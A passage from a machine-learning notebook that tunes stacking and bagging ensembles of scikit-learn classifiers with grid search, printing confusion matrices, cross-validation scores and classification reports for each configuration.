[ 214 715]]
True Negatives (TN) = 2291
False Positives (FP) = 248
False Negatives (FN) = 214
True Positives (TP) = 715
Accuracy: 0.8667820069204152
Sensitivity: 0.7696447793326158
Specificity: 0.9023237495076802
Geometric Mean: 0.8333479243847776
Precision: 0.8684692560858799
Recall: 0.8667820069204152
f1-score: 0.8675300072805835
------------------------------------------------
Classification Report:
precision recall f1-score support
0 0.9146 0.9023 0.9084 2539
1 0.7425 0.7696 0.7558 929
accuracy 0.8668 3468
macro avg 0.8285 0.8360 0.8321 3468
weighted avg 0.8685 0.8668 0.8675 3468
Current Time: 2024-01-02 21:43:08
The entire notebook runtime so far is 175 minutes
# start with multiple weak base_estimators, then create a for loop to test each final_estimator, keeping track of the best final_estimator
estimator_type = "weak" #strong|weak flag to determine which base estimators to use
strong_base_estimators = [('rf', rf_clf), ('gb', gb_clf), ('dt', dt_clf)]
weak_base_estimators = [('lr', lr_clf), ('nb', nb_clf), ('svm', svm_clf), ('knn', knn_clf), ('mlp', mlp_clf)]
final_estimators = ['RandomForestClassifier', 'DecisionTreeClassifier', 'GradientBoostingClassifier','LogisticRegression','BernoulliNB', 'SVC', 'KNN', 'MLPClassifier']
final_estimators = ['BernoulliNB', 'SVC', 'KNN', 'MLPClassifier', 'LogisticRegression']
if (estimator_type == "strong"): base_estimators = strong_base_estimators
if (estimator_type == "weak"): base_estimators = weak_base_estimators
best_final_estimator_name = "none"
best_final_estimator_accuracy = 0 #initialize value to keep track of the accuracy level of each final classifier
for my_final_estimator in final_estimators:
print('\n')
print(f"Testing hyperparameter optimization with {estimator_type} base estimators {base_estimators} and final_estimator={my_final_estimator}")
if (my_final_estimator == 'RandomForestClassifier'):
ensemble = StackingClassifier(estimators=base_estimators, final_estimator=RandomForestClassifier())
ensemble_params = {'final_estimator__n_estimators': [50, 100, 200], 'final_estimator__max_depth': [None, 5, 10, 15]} #tunable hyperparameters for final_estimator
if (my_final_estimator == 'DecisionTreeClassifier'):
ensemble = StackingClassifier(estimators=base_estimators, final_estimator=DecisionTreeClassifier())
ensemble_params = {'final_estimator__max_depth': [None, 5, 10, 15]} #tunable hyperparameters for final_estimator
if (my_final_estimator == 'GradientBoostingClassifier'):
ensemble = StackingClassifier(estimators=base_estimators, final_estimator=GradientBoostingClassifier())
ensemble_params = {'final_estimator__n_estimators': [10, 100, 300], 'final_estimator__learning_rate': [0.1, 0.01, 0.2], 'final_estimator__max_depth': [3,5,10]} #tunable hyperparameters for final_estimator
if (my_final_estimator == 'LogisticRegression'):
ensemble = StackingClassifier(estimators=base_estimators, final_estimator=LogisticRegression())
ensemble_params = {'final_estimator__C': [1, 10, 100], 'final_estimator__max_iter': [100, 200, 300]} #tunable hyperparameters for final_estimator
if (my_final_estimator == 'BernoulliNB'):
ensemble = StackingClassifier(estimators=base_estimators, final_estimator=BernoulliNB())
ensemble_params = {'final_estimator__alpha': [0.1, 0.001]} #tunable hyperparameters for final_estimator
if (my_final_estimator == 'SVC'):
ensemble = StackingClassifier(estimators=base_estimators, final_estimator=SVC())
ensemble_params = {'final_estimator__C': [1, 10]} #tunable hyperparameters for final_estimator
if (my_final_estimator == 'KNN'):
ensemble = StackingClassifier(estimators=base_estimators, final_estimator=KNeighborsClassifier())
ensemble_params = {'final_estimator__n_neighbors': [10,30]} #tunable hyperparameters for final_estimator
if (my_final_estimator == 'MLPClassifier'):
ensemble = StackingClassifier(estimators=base_estimators, final_estimator=MLPClassifier())
ensemble_params = {'final_estimator__hidden_layer_sizes': [(100, 50), (50, 25), (150, 100)], 'final_estimator__max_iter': [500, 800], 'final_estimator__alpha': [0.001, 0.01]} #tunable hyperparameters for final_estimator
print(f"Performing GridSearchCV for final_estimator={my_final_estimator}")
ensemble_grid = GridSearchCV(ensemble, ensemble_params, cv=cv_count, scoring='accuracy')
print(f"Fitting model")
ensemble_grid.fit(X_train_resampled, y_train_label_resampled)
# Validate on Test Set
clf = ensemble_grid.best_estimator_
print(f"Found best_estimator_ {clf}")
y_pred = clf.predict(X_test)
# final cross validation
cross_val_score_result = cross_val_score(clf, X_train_resampled, y_train_label_resampled, cv=cv_count)
print(f"Cross validation scores: {cross_val_score_result}")
print(f"Mean cross validation score: {cross_val_score_result.mean()}")
print(f"Standard Deviation cross validation score: {cross_val_score_result.std()}")
# Evaluate performance on the test set
accuracy = accuracy_score(y_test_label, y_pred)
print(f"Final Accuracy on Test Set: {accuracy}")
# of all the final_estimators, check to see if this final_estimator provides the best accuracy
if (accuracy > best_final_estimator_accuracy):
best_final_estimator_name = my_final_estimator #save the name of the final_estimator that is currently the best
best_final_estimator_accuracy = accuracy #save the accuracy of the final estimator that is currently the best
print(f"The best final_estimator so far is {best_final_estimator_name}, with accuracy of {best_final_estimator_accuracy}")
else:
print(f"This is not the best base classifier")
# save accuracy for later comparison
accuracy_ensemble_stacking = best_final_estimator_accuracy
# call previously defined function to create confusion matrix
cm = visualize_confusion_matrix(y_test_label, y_pred)
# call previously defined function to create report on model precision, recall, f1-score, accuracy
model_classification_report(cm, y_test_label, y_pred)
# show a running total of elapsed time for the entire notebook
show_elapsed_time()
# after testing all the final_estimators, display the best one
print(f"After checking each final_estimator, the best final_estimator is {best_final_estimator_name}, with accuracy of {best_final_estimator_accuracy}")
Testing hyperparameter optimization with weak base estimators [('lr', LogisticRegression(C=100, random_state=42, solver='liblinear')), ('nb', BernoulliNB(alpha=0.1)), ('svm', SVC(C=10, probability=True, random_state=42)), ('knn', KNeighborsClassifier(n_neighbors=10)), ('mlp', MLPClassifier(alpha=0.01, hidden_layer_sizes=(150, 100), max_iter=300,
random_state=42))] and final_estimator=BernoulliNB
Performing GridSearchCV for final_estimator=BernoulliNB
Fitting model
Found best_estimator_ StackingClassifier(estimators=[('lr',
LogisticRegression(C=100, random_state=42,
solver='liblinear')),
('nb', BernoulliNB(alpha=0.1)),
('svm',
SVC(C=10, probability=True, random_state=42)),
('knn', KNeighborsClassifier(n_neighbors=10)),
('mlp',
MLPClassifier(alpha=0.01,
hidden_layer_sizes=(150, 100),
max_iter=300, random_state=42))],
final_estimator=BernoulliNB(alpha=0.1))
Cross validation scores: [0.6939314 0.67810026 0.72391017 0.69352708 0.71202114 0.71598415
0.68692206 0.68560106 0.71202114 0.68428005]
Mean cross validation score: 0.6986298505069658
Standard Deviation cross validation score: 0.015103759396059385
Final Accuracy on Test Set: 0.5729527104959631
The best final_estimator so far is BernoulliNB, with accuracy of 0.5729527104959631
Confusion matrix
[[1071 1468]
[ 13 916]]
True Negatives (TN) = 1071
False Positives (FP) = 1468
False Negatives (FN) = 13
True Positives (TP) = 916
Accuracy: 0.5729527104959631
Sensitivity: 0.9860064585575888
Specificity: 0.4218196140212682
Geometric Mean: 0.6449161680181694
Precision: 0.8262683750243833
Recall: 0.5729527104959631
f1-score: 0.5809765252080529
------------------------------------------------
Classification Report:
precision recall f1-score support
0 0.9880 0.4218 0.5912 2539
1 0.3842 0.9860 0.5530 929
accuracy 0.5730 3468
macro avg 0.6861 0.7039 0.5721 3468
weighted avg 0.8263 0.5730 0.5810 3468
Current Time: 2024-01-02 22:09:34
The entire notebook runtime so far is 201 minutes
Testing hyperparameter optimization with weak base estimators [('lr', LogisticRegression(C=100, random_state=42, solver='liblinear')), ('nb', BernoulliNB(alpha=0.1)), ('svm', SVC(C=10, probability=True, random_state=42)), ('knn', KNeighborsClassifier(n_neighbors=10)), ('mlp', MLPClassifier(alpha=0.01, hidden_layer_sizes=(150, 100), max_iter=300,
random_state=42))] and final_estimator=SVC
Performing GridSearchCV for final_estimator=SVC
Fitting model
Found best_estimator_ StackingClassifier(estimators=[('lr',
LogisticRegression(C=100, random_state=42,
solver='liblinear')),
('nb', BernoulliNB(alpha=0.1)),
('svm',
SVC(C=10, probability=True, random_state=42)),
('knn', KNeighborsClassifier(n_neighbors=10)),
('mlp',
MLPClassifier(alpha=0.01,
hidden_layer_sizes=(150, 100),
max_iter=300, random_state=42))],
final_estimator=SVC(C=10))
Cross validation scores: [0.86807388 0.85092348 0.84808454 0.85733157 0.85336856 0.84280053
0.86129458 0.84412153 0.85733157 0.85336856]
Mean cross validation score: 0.8536698814581932
Standard Deviation cross validation score: 0.007352967218198152
Final Accuracy on Test Set: 0.8886966551326413
The best final_estimator so far is SVC, with accuracy of 0.8886966551326413
Confusion matrix
[[2400 139]
[ 247 682]]
True Negatives (TN) = 2400
False Positives (FP) = 139
False Negatives (FN) = 247
True Positives (TP) = 682
Accuracy: 0.8886966551326413
Sensitivity: 0.7341227125941873
Specificity: 0.9452540370224498
Geometric Mean: 0.8330260846753402
Precision: 0.8863301054444178
Recall: 0.8886966551326413
f1-score: 0.8864211146312839
------------------------------------------------
Classification Report:
precision recall f1-score support
0 0.9067 0.9453 0.9256 2539
1 0.8307 0.7341 0.7794 929
accuracy 0.8887 3468
macro avg 0.8687 0.8397 0.8525 3468
weighted avg 0.8863 0.8887 0.8864 3468
Current Time: 2024-01-02 22:37:57
The entire notebook runtime so far is 230 minutes
Testing hyperparameter optimization with weak base estimators [('lr', LogisticRegression(C=100, random_state=42, solver='liblinear')), ('nb', BernoulliNB(alpha=0.1)), ('svm', SVC(C=10, probability=True, random_state=42)), ('knn', KNeighborsClassifier(n_neighbors=10)), ('mlp', MLPClassifier(alpha=0.01, hidden_layer_sizes=(150, 100), max_iter=300,
random_state=42))] and final_estimator=KNN
Performing GridSearchCV for final_estimator=KNN
Fitting model
Found best_estimator_ StackingClassifier(estimators=[('lr',
LogisticRegression(C=100, random_state=42,
solver='liblinear')),
('nb', BernoulliNB(alpha=0.1)),
('svm',
SVC(C=10, probability=True, random_state=42)),
('knn', KNeighborsClassifier(n_neighbors=10)),
('mlp',
MLPClassifier(alpha=0.01,
hidden_layer_sizes=(150, 100),
max_iter=300, random_state=42))],
final_estimator=KNeighborsClassifier(n_neighbors=30))
Cross validation scores: [0.86411609 0.84960422 0.84412153 0.86129458 0.84808454 0.84412153
0.84147952 0.83751651 0.85204756 0.85468956]
Mean cross validation score: 0.8497075666688743
Standard Deviation cross validation score: 0.008084153789935973
Final Accuracy on Test Set: 0.8884083044982699
This is not the best base classifier
Confusion matrix
[[2400 139]
[ 248 681]]
True Negatives (TN) = 2400
False Positives (FP) = 139
False Negatives (FN) = 248
True Positives (TP) = 681
Accuracy: 0.8884083044982699
Sensitivity: 0.7330462863293864
Specificity: 0.9452540370224498
Geometric Mean: 0.8324151377030377
Precision: 0.8860241147480419
Recall: 0.8884083044982699
f1-score: 0.8861035313085495
------------------------------------------------
Classification Report:
precision recall f1-score support
0 0.9063 0.9453 0.9254 2539
1 0.8305 0.7330 0.7787 929
accuracy 0.8884 3468
macro avg 0.8684 0.8392 0.8521 3468
weighted avg 0.8860 0.8884 0.8861 3468
Current Time: 2024-01-02 23:05:11
The entire notebook runtime so far is 257 minutes
Testing hyperparameter optimization with weak base estimators [('lr', LogisticRegression(C=100, random_state=42, solver='liblinear')), ('nb', BernoulliNB(alpha=0.1)), ('svm', SVC(C=10, probability=True, random_state=42)), ('knn', KNeighborsClassifier(n_neighbors=10)), ('mlp', MLPClassifier(alpha=0.01, hidden_layer_sizes=(150, 100), max_iter=300,
random_state=42))] and final_estimator=MLPClassifier
Performing GridSearchCV for final_estimator=MLPClassifier
Fitting model
Found best_estimator_ StackingClassifier(estimators=[('lr',
LogisticRegression(C=100, random_state=42,
solver='liblinear')),
('nb', BernoulliNB(alpha=0.1)),
('svm',
SVC(C=10, probability=True, random_state=42)),
('knn', KNeighborsClassifier(n_neighbors=10)),
('mlp',
MLPClassifier(alpha=0.01,
hidden_layer_sizes=(150, 100),
max_iter=300, random_state=42))],
final_estimator=MLPClassifier(alpha=0.01,
hidden_layer_sizes=(50, 25),
max_iter=500))
Cross validation scores: [0.86939314 0.84828496 0.84676354 0.85865258 0.85601057 0.8348745
0.85072655 0.84544254 0.85601057 0.85204756]
Mean cross validation score: 0.8518206501849056
Standard Deviation cross validation score: 0.008704910170320233
Final Accuracy on Test Set: 0.9051326412918108
The best final_estimator so far is MLPClassifier, with accuracy of 0.9051326412918108
Confusion matrix
[[2490 49]
[ 280 649]]
True Negatives (TN) = 2490
False Positives (FP) = 49
False Negatives (FN) = 280
True Positives (TP) = 649
Accuracy: 0.9051326412918108
Sensitivity: 0.6986006458557589
Specificity: 0.9807010634107917
Geometric Mean: 0.8277187905866391
Precision: 0.9071896909247958
Recall: 0.9051326412918108
f1-score: 0.9004619377868338
------------------------------------------------
Classification Report:
precision recall f1-score support
0 0.8989 0.9807 0.9380 2539
1 0.9298 0.6986 0.7978 929
accuracy 0.9051 3468
macro avg 0.9144 0.8397 0.8679 3468
weighted avg 0.9072 0.9051 0.9005 3468
Current Time: 2024-01-03 01:04:42
The entire notebook runtime so far is 377 minutes
Testing hyperparameter optimization with weak base estimators [('lr', LogisticRegression(C=100, random_state=42, solver='liblinear')), ('nb', BernoulliNB(alpha=0.1)), ('svm', SVC(C=10, probability=True, random_state=42)), ('knn', KNeighborsClassifier(n_neighbors=10)), ('mlp', MLPClassifier(alpha=0.01, hidden_layer_sizes=(150, 100), max_iter=300,
random_state=42))] and final_estimator=LogisticRegression
Performing GridSearchCV for final_estimator=LogisticRegression
Fitting model
Found best_estimator_ StackingClassifier(estimators=[('lr',
LogisticRegression(C=100, random_state=42,
solver='liblinear')),
('nb', BernoulliNB(alpha=0.1)),
('svm',
SVC(C=10, probability=True, random_state=42)),
('knn', KNeighborsClassifier(n_neighbors=10)),
('mlp',
MLPClassifier(alpha=0.01,
hidden_layer_sizes=(150, 100),
max_iter=300, random_state=42))],
final_estimator=LogisticRegression(C=1))
Cross validation scores: [0.86147757 0.83905013 0.84676354 0.85733157 0.85865258 0.82826948
0.85468956 0.83883752 0.84015852 0.85468956]
Mean cross validation score: 0.8479920042662503
Standard Deviation cross validation score: 0.01043102379312776
Final Accuracy on Test Set: 0.8667820069204152
This is not the best base classifier
Confusion matrix
[[2291 248]
[ 214 715]]
True Negatives (TN) = 2291
False Positives (FP) = 248
False Negatives (FN) = 214
True Positives (TP) = 715
Accuracy: 0.8667820069204152
Sensitivity: 0.7696447793326158
Specificity: 0.9023237495076802
Geometric Mean: 0.8333479243847776
Precision: 0.8684692560858799
Recall: 0.8667820069204152
f1-score: 0.8675300072805835
------------------------------------------------
Classification Report:
precision recall f1-score support
0 0.9146 0.9023 0.9084 2539
1 0.7425 0.7696 0.7558 929
accuracy 0.8668 3468
macro avg 0.8285 0.8360 0.8321 3468
weighted avg 0.8685 0.8668 0.8675 3468
Current Time: 2024-01-03 02:30:25
The entire notebook runtime so far is 462 minutes
After checking each final_estimator, the best final_estimator is MLPClassifier, with accuracy of 0.9051326412918108
# Bagging can only use a single base classifier
# Use a for loop to test all the base classifiers with bagging, one base classifier at a time, keeping track of the best_final_estimator_name
best_base_classifier_name = "none"
best_base_classifier_accuracy = 0 #initialize value to keep track of the accuracy level of each base classifier
base_classifiers = [lr_clf, dt_clf, rf_clf, nb_clf, svm_clf, knn_clf, mlp_clf, gb_clf, xgb_clf] #xgb_clf causing error?
base_classifiers = [lr_clf, dt_clf, rf_clf, nb_clf, svm_clf, knn_clf, mlp_clf, gb_clf] # all classifiers
base_classifiers = [dt_clf, rf_clf, gb_clf] # strong learners
base_classifiers = [lr_clf, nb_clf, svm_clf, knn_clf, mlp_clf] # weak learners
for base_classifier in base_classifiers:
print("\n")
print(f"------------------------------------")
print(f"Base classifier is {base_classifier}")
print(f"------------------------------------")
# Define the BaggingClassifier
clf = BaggingClassifier(base_classifier, n_estimators=50, random_state=42)
# Fit the model to the training data
clf.fit(X_train_resampled, y_train_label_resampled)
# Predict on the test set
y_pred = clf.predict(X_test)
# Evaluate the accuracy
accuracy = accuracy_score(y_test_label, y_pred)
print(f"Accuracy: {accuracy}")
accuracy = clf.score(X_test, y_test_label)
print("Accuracy:", accuracy)
# of all the base_classifiers, check to see if this base_classifier provides the best accuracy
if (accuracy > best_base_classifier_accuracy):
best_base_classifier_name = base_classifier #save the name of the base_classifier that is currently the best
best_base_classifier_accuracy = accuracy #save the accuracy of the final estimator that is currently the best
print(f"The best base_classifier so far is {best_base_classifier_name}, with accuracy of {best_base_classifier_accuracy}")
else:
print(f"This is not the best base classifier")
# save accuracy for later comparison
accuracy_ensemble_bagging = best_base_classifier_accuracy
# call previously defined function to create confusion matrix
cm = visualize_confusion_matrix(y_test_label, y_pred)
# call previously defined function to create report on model precision, recall, f1-score, accuracy
model_classification_report(cm, y_test_label, y_pred)
# show a running total of elapsed time for the entire notebook
show_elapsed_time()
# after testing all the final_estimators, display the best one
print(f"After checking each base_classifier, the best base_classifier is {best_base_classifier_name}, with accuracy of {best_base_classifier_accuracy}")
------------------------------------ Base classifier is LogisticRegression(C=100, random_state=42, solver='liblinear') ------------------------------------ Accuracy: 0.8734140715109573 Accuracy: 0.8734140715109573 The best base_classifier so far is LogisticRegression(C=100, random_state=42, solver='liblinear'), with accuracy of 0.8734140715109573
Confusion matrix
[[2356 183]
[ 256 673]]
True Negatives (TN) = 2356
False Positives (FP) = 183
False Negatives (FN) = 256
True Positives (TP) = 673
Accuracy: 0.8734140715109573
Sensitivity: 0.7244348762109796
Specificity: 0.9279243796770382
Geometric Mean: 0.8198907141348079
Precision: 0.8709770364299791
Recall: 0.8734140715109573
f1-score: 0.8717226079852614
------------------------------------------------
Classification Report:
precision recall f1-score support
0 0.9020 0.9279 0.9148 2539
1 0.7862 0.7244 0.7541 929
accuracy 0.8734 3468
macro avg 0.8441 0.8262 0.8344 3468
weighted avg 0.8710 0.8734 0.8717 3468
Current Time: 2024-01-03 02:30:28
The entire notebook runtime so far is 462 minutes
------------------------------------
Base classifier is BernoulliNB(alpha=0.1)
------------------------------------
Accuracy: 0.7678777393310265
Accuracy: 0.7678777393310265
This is not the best base classifier
Confusion matrix
[[2100 439]
[ 366 563]]
True Negatives (TN) = 2100
False Positives (FP) = 439
False Negatives (FN) = 366
True Positives (TP) = 563
Accuracy: 0.7678777393310265
Sensitivity: 0.6060279870828849
Specificity: 0.8270972823946435
Geometric Mean: 0.7079859470154406
Precision: 0.7739759181239302
Recall: 0.7678777393310265
f1-score: 0.7705725432085907
------------------------------------------------
Classification Report:
precision recall f1-score support
0 0.8516 0.8271 0.8392 2539
1 0.5619 0.6060 0.5831 929
accuracy 0.7679 3468
macro avg 0.7067 0.7166 0.7111 3468
weighted avg 0.7740 0.7679 0.7706 3468
Current Time: 2024-01-03 02:30:28
The entire notebook runtime so far is 462 minutes
------------------------------------
Base classifier is SVC(C=10, probability=True, random_state=42)
------------------------------------
Accuracy: 0.8748558246828143
Accuracy: 0.8748558246828143
The best base_classifier so far is SVC(C=10, probability=True, random_state=42), with accuracy of 0.8748558246828143
Confusion matrix
[[2329 210]
[ 224 705]]
True Negatives (TN) = 2329
False Positives (FP) = 210
False Negatives (FN) = 224
True Positives (TP) = 705
Accuracy: 0.8748558246828143
Sensitivity: 0.7588805166846071
Specificity: 0.9172902717605357
Geometric Mean: 0.8343342947424605
Precision: 0.8742835190425253
Recall: 0.8748558246828143
f1-score: 0.8745528018250871
------------------------------------------------
Classification Report:
precision recall f1-score support
0 0.9123 0.9173 0.9148 2539
1 0.7705 0.7589 0.7646 929
accuracy 0.8749 3468
macro avg 0.8414 0.8381 0.8397 3468
weighted avg 0.8743 0.8749 0.8746 3468
Current Time: 2024-01-03 02:34:40
The entire notebook runtime so far is 467 minutes
------------------------------------
Base classifier is KNeighborsClassifier(n_neighbors=10)
------------------------------------
Accuracy: 0.8690888119953863
Accuracy: 0.8690888119953863
This is not the best base classifier
Confusion matrix
[[2297 242]
[ 212 717]]
True Negatives (TN) = 2297
False Positives (FP) = 242
False Negatives (FN) = 212
True Positives (TP) = 717
Accuracy: 0.8690888119953863
Sensitivity: 0.7717976318622174
Specificity: 0.9046868846002363
Geometric Mean: 0.8356046883013938
Precision: 0.8705408048923264
Recall: 0.8690888119953863
f1-score: 0.8697398911179515
------------------------------------------------
Classification Report:
precision recall f1-score support
0 0.9155 0.9047 0.9101 2539
1 0.7477 0.7718 0.7595 929
accuracy 0.8691 3468
macro avg 0.8316 0.8382 0.8348 3468
weighted avg 0.8705 0.8691 0.8697 3468
Current Time: 2024-01-03 02:34:48
The entire notebook runtime so far is 467 minutes
------------------------------------
Base classifier is MLPClassifier(alpha=0.01, hidden_layer_sizes=(150, 100), max_iter=300,
random_state=42)
------------------------------------
Accuracy: 0.8852364475201846
Accuracy: 0.8852364475201846
The best base_classifier so far is MLPClassifier(alpha=0.01, hidden_layer_sizes=(150, 100), max_iter=300,
random_state=42), with accuracy of 0.8852364475201846
Confusion matrix
[[2370 169]
[ 229 700]]
True Negatives (TN) = 2370
False Positives (FP) = 169
False Negatives (FN) = 229
True Positives (TP) = 700
Accuracy: 0.8852364475201846
Sensitivity: 0.7534983853606028
Specificity: 0.9334383615596692
Geometric Mean: 0.8386562455910391
Precision: 0.8833962122638598
Recall: 0.8852364475201846
f1-score: 0.8839916809465299
------------------------------------------------
Classification Report:
precision recall f1-score support
0 0.9119 0.9334 0.9225 2539
1 0.8055 0.7535 0.7786 929
accuracy 0.8852 3468
macro avg 0.8587 0.8435 0.8506 3468
weighted avg 0.8834 0.8852 0.8840 3468
Current Time: 2024-01-03 02:39:31
The entire notebook runtime so far is 471 minutes
After checking each base_classifier, the best base_classifier is MLPClassifier(alpha=0.01, hidden_layer_sizes=(150, 100), max_iter=300,
random_state=42), with accuracy of 0.8852364475201846
# HINT: in sklearn.ensemble.BaggingClassifier version 1.2.0, the "base_estimator" parameter was renamed to "estimator"
# The base_estimator parameter is deprecated in sklearn version 1.2.0, and will be removed in version 1.4.0
# https://scikit-learn.org/stable/modules/generated/sklearn.ensemble.BaggingClassifier.html
# Check to see if this version of BaggingClassifer() expects to have a "base_estimator" or "estimator" parameter
# Print the version of scikit-learn
print("Currently installed scikit-learn version is:", sklearn.__version__)
# Create an instance of the BaggingClassifier model
clf = BaggingClassifier()
# Figure out which parameters exist
default_params = clf.get_params()
print(f"Default parameters are {default_params}")
# Check to see if the base_estimator parameter exists in the BaggingClassifier, which would indicate an outdated version of scikit-learn
desired_parameter1 = 'base_estimator' # Replace with the parameter you want to check
desired_parameter2 = 'estimator' # Replace with the parameter you want to check
# This if block will only be executed if the scikit-learn package is older than 1.2
if (desired_parameter1 in clf.get_params()) and not (desired_parameter2 in clf.get_params()) :
print('\n')
print(f"WARNING: the '{desired_parameter1}' parameter exists, but the '{desired_parameter2}' parameter does not exist the BaggingClassifier.")
print(f"The parameter 'base_estimator' was deprecated in favor of 'estimator' in sklearn 1.2.0, will be removed entirely in sklearn 1.4.0.")
print(f"Your currently installed version of scikit-learn is", sklearn.__version__)
print(f"You may wish to update your installed version of scikit-learn to a minimum of 1.2.0 so you can use the 'estimator__' parameter in the next cell.")
print(f"If you are unable to update your installed version of scikit-learn, you will need to change 'estimator__' to 'base_estimator__' in the following cell for compatibility with your version of scikit-learn.")
print(f"If you are using Anaconda Navigator, you can upgrade with: conda update conda, conda update scikit-learn")
print(f"If you are not using Anaconda Navigator, you can upgrade with: pip install --upgrade scikit-learn")
Currently installed scikit-learn version is: 1.3.0
Default parameters are {'base_estimator': 'deprecated', 'bootstrap': True, 'bootstrap_features': False, 'estimator': None, 'max_features': 1.0, 'max_samples': 1.0, 'n_estimators': 10, 'n_jobs': None, 'oob_score': False, 'random_state': None, 'verbose': 0, 'warm_start': False}
# Try different weak learners with different BaggingClassifier parameters, keeping track of which base_estimator provides the best accuracy
best_base_estimator_name = "none"
best_base_estimator_accuracy = 0 #initialize value to keep track of the accuracy level of each base classifier
base_estimators = ['lr', 'nb', 'svm', 'mlp', 'knn'] # weak learners
for base_estimator in base_estimators:
print("\n")
print(f"------------------------------------")
print(f"Base estimator is {base_estimator}")
print(f"------------------------------------")
if (base_estimator == 'lr'):
clf = BaggingClassifier(LogisticRegression(), random_state=42) # Define the BaggingClassifier
param_grid = {'estimator__penalty': [best_params_lr['penalty']], # optimized hyperparameter from base_estimator
'estimator__C': [best_params_lr['C']], # optimized hyperparameter from base_estimator
'estimator__solver': [best_params_lr['solver']], # optimized hyperparameter from base_estimator
'estimator__max_iter': [best_params_lr['max_iter']], # optimized hyperparameter from base_estimator
'n_estimators': [100], # Number of base estimators
'max_samples': [1.0], # The proportion of samples to draw from X to train each base estimator
'max_features': [1.0] # The proportion of features to draw from X to train each base estimator
}
if (base_estimator == 'nb'):
clf = BaggingClassifier(BernoulliNB(), random_state=42) # Define the BaggingClassifier
param_grid = {'estimator__alpha': [best_params_nb['alpha']], # optimized hyperparameter from base_estimator
'n_estimators': [50, 100, 200], # Number of base estimators
'max_samples': [0.5, 0.7, 1.0], # The proportion of samples to draw from X to train each base estimator
'max_features': [0.5, 0.7, 1.0] # The proportion of features to draw from X to train each base estimator
}
if (base_estimator == 'svm'):
clf = BaggingClassifier(SVC(), random_state=42) # Define the BaggingClassifier
param_grid = {'estimator__C': [best_params_svm['C']], # optimized hyperparameter from base_estimator
'estimator__kernel': [best_params_svm['kernel']], # optimized hyperparameter from base_estimator
'n_estimators': [200], # Number of base estimators
'max_samples': [1.0], # The proportion of samples to draw from X to train each base estimator
'max_features': [1.0] # The proportion of features to draw from X to train each base estimator
}
if (base_estimator == 'knn'):
clf = BaggingClassifier(KNeighborsClassifier(), random_state=42) # Define the BaggingClassifier
param_grid = {'estimator__n_neighbors': [best_params_knn['n_neighbors']], # optimized hyperparameter from base_estimator
'estimator__weights': [best_params_knn['weights']], # optimized hyperparameter from base_estimator
'n_estimators': [100], # Number of base estimators
'max_samples': [1.0], # The proportion of samples to draw from X to train each base estimator
'max_features': [0.5] # The proportion of features to draw from X to train each base estimator
}
if (base_estimator == 'mlp'):
clf = BaggingClassifier(MLPClassifier(), random_state=42) # Define the BaggingClassifier
param_grid = {'estimator__hidden_layer_sizes': [best_params_mlp['hidden_layer_sizes']], # optimized hyperparameter from base_estimator
'estimator__max_iter': [best_params_mlp['max_iter']], # optimized hyperparameter from base_estimator
'estimator__alpha': [best_params_mlp['alpha']], # optimized hyperparameter from base_estimator
'n_estimators': [100], # Number of base estimators
'max_samples': [1.0], # The proportion of samples to draw from X to train each base estimator
'max_features': [0.5] # The proportion of features to draw from X to train each base estimator
}
# Use GridSearchCV for hyperparameter tuning
print(f"Performing GridSearchCV")
grid_search = GridSearchCV(clf, param_grid, cv=cv_count, scoring='accuracy')
print(f"Fitting model")
grid_search.fit(X_train_resampled, y_train_label_resampled)
# Print the best hyperparameters
best_params = grid_search.best_params_
best_scores = grid_search.best_score_
print("Best Parameters:", best_params)
print("Best Scores:", best_scores)
# Evaluate the model with the best hyperparameters on the test set
clf = grid_search.best_estimator_
y_pred = clf.predict(X_test)
# final cross validation
cross_val_score_result = cross_val_score(clf, X_train_resampled, y_train_label_resampled, cv=cv_count)
print(f"Cross validation scores: {cross_val_score_result}")
print(f"Mean cross validation score: {cross_val_score_result.mean()}")
print(f"Standard Deviation cross validation score: {cross_val_score_result.std()}")
# Evaluate the accuracy
accuracy = accuracy_score(y_test_label, y_pred)
print(f"Accuracy on Test Set: {accuracy}")
accuracy = clf.score(X_test, y_test_label)
print("Accuracy:", accuracy)
# of all the base_classifiers, check to see if this base_classifier provides the best accuracy
if (accuracy > best_base_estimator_accuracy):
best_params_ensemble_bagging = best_params #save best parameters for later comparison
best_base_estimator_name = base_estimator #save the name of the base_classifier that is currently the best
best_base_estimator_accuracy = accuracy #save the accuracy of the final estimator that is currently the best
print(f"The best base_estimator so far is {best_base_estimator_name}, with accuracy of {best_base_estimator_accuracy}")
else:
print(f"This is not the best base estimator")
# call previously defined function to create confusion matrix
cm = visualize_confusion_matrix(y_test_label, y_pred)
# call previously defined function to create report on model precision, recall, f1-score, accuracy
model_classification_report(cm, y_test_label, y_pred)
# show a running total of elapsed time for the entire notebook
show_elapsed_time()
# after testing all the final_estimators, display the best one
print(f"After checking each base_estimator, the best base_estimator is {best_base_estimator_name}, with accuracy of {best_base_estimator_accuracy}, and best_params of {best_params}")
------------------------------------
Base estimator is lr
------------------------------------
Performing GridSearchCV
Fitting model
Best Parameters: {'estimator__C': 100, 'estimator__max_iter': 100, 'estimator__penalty': 'l2', 'estimator__solver': 'liblinear', 'max_features': 1.0, 'max_samples': 1.0, 'n_estimators': 100}
Best Scores: 0.8437651401344706
Cross validation scores: [0.85620053 0.84168865 0.83883752 0.84147952 0.84940555 0.82694848
0.86261559 0.82959049 0.84808454 0.84280053]
Mean cross validation score: 0.8437651401344706
Standard Deviation cross validation score: 0.010387098978139235
Accuracy on Test Set: 0.8734140715109573
Accuracy: 0.8734140715109573
The best base_estimator so far is lr, with accuracy of 0.8734140715109573
Confusion matrix
[[2356 183]
[ 256 673]]
True Negatives (TN) = 2356
False Positives (FP) = 183
False Negatives (FN) = 256
True Positives (TP) = 673
Accuracy: 0.8734140715109573
Sensitivity: 0.7244348762109796
Specificity: 0.9279243796770382
Geometric Mean: 0.8198907141348079
Precision: 0.8709770364299791
Recall: 0.8734140715109573
f1-score: 0.8717226079852614
------------------------------------------------
Classification Report:
precision recall f1-score support
0 0.9020 0.9279 0.9148 2539
1 0.7862 0.7244 0.7541 929
accuracy 0.8734 3468
macro avg 0.8441 0.8262 0.8344 3468
weighted avg 0.8710 0.8734 0.8717 3468
Current Time: 2024-01-03 02:41:20
The entire notebook runtime so far is 473 minutes
------------------------------------
Base estimator is nb
------------------------------------
Performing GridSearchCV
Fitting model
Best Parameters: {'estimator__alpha': 0.1, 'max_features': 0.5, 'max_samples': 0.7, 'n_estimators': 50}
Best Scores: 0.7276797384481863
Cross validation scores: [0.73218997 0.73218997 0.71202114 0.74768824 0.74504624 0.69484808
0.72919419 0.74108322 0.74108322 0.7014531 ]
Mean cross validation score: 0.7276797384481863
